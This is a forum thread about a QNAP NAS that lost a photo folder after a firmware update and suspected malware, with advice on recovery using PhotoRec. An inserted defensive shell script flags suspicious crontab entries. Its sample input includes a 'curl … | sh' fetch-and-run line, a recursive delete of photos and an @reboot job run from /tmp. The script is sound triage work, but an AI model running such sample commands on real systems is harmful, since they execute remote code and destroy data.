Folder contents missing

SvenW
New here
Posts: 3
Joined: Fri Sep 08, 2017 3:14 am

Folder contents missing

Post by SvenW »

Hello,

----< Long and rambling description on how I got to the current problem >----

I'm not sure this goes in the right sub-forum, but couldn't find any better matches, so here goes. Yesterday, a longish string of events started unrolling. I logged into my TS-251 NAS, for the first time in a while, and was prompted to update my firmware, which I did. Updating the firmware removed Twonky, so I experimented a while with QNAP's own DLNA service, to no avail. Part of this process was a lengthy indexing process, that I assumed loaded the NAS CPU heavily. Load, however, stayed at 100% after the indexing. The DLNA contraption stopped co-operating when I made changes to pre-set shared folders; it wouldn't share any folders that were not marked as media folders, so I tried setting this parameter in the Filestation for the folders I tried to change; the parameter wouldn't stick to the folders. Shortly after I found that Twonky could after all be installed manually, and managed to do this, now that side of things is working fine. To get this running I had to remove an older version of Twonky apparently re-introduced to the latest firmware updates.

Since the CPU load stayed at 100% I started surfing around that subject and found these threads:
https://www.reddit.com/r/qnap/comments/ ... t_100_cpu/
viewtopic.php?t=133006

Apparently I had malware on the NAS, so I followed the instructions given on both threads, and as far as I know managed to oust the malware. The removal app reported successful removals, and I manually deleted something running in the container station. The container station itself was not something I had knowingly used before and seemed meant for applications I wasn't planning to use, so I removed the entire station while I was at it. After reading about potential vulnerabilities in media sharing apps I removed also the photo-, video- and music stations, which I have never used. Now the CPU load is low on idle, and NAS seems to reject unauthorized connection attempts.

---< TLDR; Current crisis >---

At some point I seem to have lost all the contents of one folder on my drives. Of course this content is my photo archive, the only truly critical content I have placed on the NAS, and the sole reason for me running the system in RAID 1 configuration. I googled what to do and followed the advice to remove one of the drives (physically pulled it out), in the hopes of not writing anything (at least anything more) over possibly recoverable data. It's possible I've already done some damage, since I'm not certain at which point and how the data was lost to me.

Any ideas how I should proceed? I'm at the limits (probably over) of my own expertise just using the browser interface to the NAS, and am in dire need of instructions given in layman's terms. I did find and read this thread:

viewtopic.php?t=67384

I have practically zero experience with Linux and other variants around the theme, so I suppose it's even possible that the data is still there and I've just lost my visibility to it somehow, but I doubt it. I connected with putty, found the folder the data was supposed to be, and found nothing.
peon2t
Starting out
Posts: 43
Joined: Mon Sep 11, 2017 1:04 am

Re: Folder contents missing

Post by peon2t »

Hello

Unfortunately I can't help you but I can add that I have a problem that may be similar to yours:

After upgrading the firmware I also see CPU load at permanent 100% and I also see my data vanishing...

I opened a thread about it viewtopic.php?f=160&t=135614.

I really hope there is a solution to this because otherwise I'm in big trouble.
Trexx
Ask me anything
Posts: 5388
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Folder contents missing

Post by Trexx »

In terms of recovering your data, you MIGHT be able to get your data back via recovery apps/etc. by plugging the drive into a USB dock. For significant $$$$$ you could also ship it to a recovery service to see if they can get the data back.

I would hope you had other backups/archives beyond the QNAP itself as RAID is NOT a substitute or replacement for backups. RAID helps to protect against data loss from a HDD failure, but NOT other potential causes of data loss.


In terms of malware, make sure you are updated to the latest 4.3.3.299 build of the firmware as it has many security fixes and also have the Malware Remover QPKG installed. It also re-enabled Twonky support for some NAS models (listed in release notes).

You may also want to see this page on ransomware: https://www.qnap.com/solution/ransomware/en/
Paul

Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350

Model: TVS-673 32GB & TS-228a Offline
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
peon2t
Starting out
Posts: 43
Joined: Mon Sep 11, 2017 1:04 am

Re: Folder contents missing

Post by peon2t »

@ SvenW

Actually if you were running a RAID1 and no encryption you might be in a much better situation than I am:

You said you already pulled the drives out of the NAS.

Now hook them (actually: one of them) up to a computer, either directly via SATA cable or by using a SATA->USB Adapter (can be bought for about 30$ - but you need one that also can power 3,5" and not only 2,5" disks!)

Then you can try to recover your data using the free Photorec tool (from cgsecurity.org). Make sure to set the file options so that only your photo files are recovered because otherwise it probably will also recover all the data that you don't need it to recover.

Unfortunately I don't know if you need to do this from a Linux machine (or at least install some ext-filesystem-drivers on your Windows machine) before or if Photorec also can do recovery from ext-filesystems when running on a Windows machine. I'm only using Linux anyway.


@ Trexx

You seem to be very confident about the reason for the data loss being malware. Do you have any explanation why this alleged malware suddenly starts to kill data after the latest firmware update and not before?
I think there is some likelihood that the "malware" we're talking about here is really the latest firmware...
(As I explained in my thread there is actually no chance how my NAS could have been infected with malware other than QNAP either distributed it themselves via their update servers or having built in massive security flaws that enable an attacker to get into the NAS from the outside without the user having to do anything...)
Trexx
Ask me anything
Posts: 5388
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Folder contents missing

Post by Trexx »

peon2t wrote: @ Trexx

You seem to be very confident about the reason for the data loss being malware. Do you have any explanation why this alleged malware suddenly starts to kill data after the latest firmware update and not before?
I think there is some likelihood that the "malware" we're talking about here is really the latest firmware...
(As I explained in my thread there is actually no chance how my NAS could have been infected with malware other than QNAP either distributed it themselves via their update servers or having built in massive security flaws that enable an attacker to get into the NAS from the outside without the user having to do anything...)

There were multiple patches for security vulnerabilities over the summer. https://www.qnap.com/en/support/con_show.php?cid=41
Even something as basic as enabling myQnapCloud in some cases was all that was needed for attackers to get a foothold in.

If they got in, they could easily plant a cron/autorun job to kick-off on reboot that deletes data. Many people don't reboot their NAS other than during firmware upgrades, so the issue (symptom) shows up during the firmware update, but the firmware itself wouldn't be the cause.

As for other ways for data loss to occur, there are multiple ways that can happen, I outlined a couple of them in your thread.
Paul

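The reply above describes a planted cron job that only fires on reboot and deletes data; one way to triage a crontab for that kind of entry is sketched here. This is an added example, not part of any post in this thread: the function names, flag labels and the sample crontab are constructed for illustration, and it covers cron entries only, not autorun scripts.

```shell
#!/bin/sh
# Triage filter: reads crontab text on stdin and prints "FLAG<TAB>entry"
# for entries that deserve a manual look. Heuristic only: a hit is a
# reason to read the entry, not proof of compromise.
audit_crontab() {
    awk '
    /^[ \t]*(#|$)/ { next }                          # comments and blank lines
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }  # VAR=value settings
    {
        line = $0; cmd = line
        if ($1 ~ /^@/) {            # nickname schedule such as @reboot
            sched = $1
            sub(/^[ \t]*[^ \t]+[ \t]+/, "", cmd)
        } else {                    # five time fields, then the command
            sched = $1 " " $2 " " $3 " " $4 " " $5
            for (i = 0; i < 5; i++) sub(/^[ \t]*[^ \t]+[ \t]+/, "", cmd)
        }
        if (sched == "@reboot")
            print "RUNS_AT_BOOT\t" line
        if (cmd ~ /(^|[^A-Za-z0-9_])rm[ \t]+-[A-Za-z]*[rR]/)
            print "RECURSIVE_DELETE\t" line
        if (cmd ~ /(curl|wget)[^|;&]*\|[ \t]*(ba)?sh/)
            print "FETCH_AND_RUN\t" line
        if (cmd ~ /(^|[ \t;|&])\/(tmp|dev\/shm)\//)
            print "RUNS_FROM_TMP\t" line
    }'
}

# Constructed sample input, not taken from any real device.
sample_crontab() {
    cat <<'EOF'
# constructed sample
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
@reboot /tmp/.cache/update.sh
*/15 * * * * curl -s http://example.invalid/a | sh
30 4 * * 0 rm -rf /mnt/data/photos/*
EOF
}

sample_crontab | audit_crontab
```

On a live system the input would be the output of `crontab -l` for each account instead of the sample.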
SvenW
New here
Posts: 3
Joined: Fri Sep 08, 2017 3:14 am

Re: Folder contents missing

Post by SvenW »

Hi All,

Thought to give an update on my progress, for posterity. I managed to salvage my photos from the drive left connected to the NAS, using PhotoRec executed from a brand new external drive, and have sifted through the gazillion files. Luckily I had an old backup on an external drive, so I could focus on more recent photos. Now I'm moving the combined collection of recovered files and old backups back to the NAS, and received a beep alert about disk utilisation reaching 80% limit. I don't remember this happening before. Looking into it, I just now found a disk utilization graph going back for a year, and it appears that the amount of data has not had a drop at any point... I would expect to see a drop equivalent to lost data, but there's nothing.

I'm planning on taking an external back-up of the entire data volume next, and then re-entering and synchronizing the ejected volume to regain RAID 1. I suppose I'll have to do something about the 'hidden' data that still takes space, but I'll wait at least after the backup. I've also continued on my endeavour to disable any services I'm not aware of using (that would be practically everything), but there's still a bunch of processes running that seem to be related to these. Malware remover also has reported once per day of finding and removing malware, although foreign connections seem to have stopped. Removal program is not informing what it has found and removed, which is getting frustrating. I wonder where the malware is coming from.

Any ideas how to get rid of the ghost data?
Trexx
Ask me anything
Posts: 5388
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Folder contents missing

Post by Trexx »

Do you have network recycle bins enabled? It is very possible the data is there. Could also be qsync versioning, thin provisioning, etc. that are impacting used vs. free space.
Paul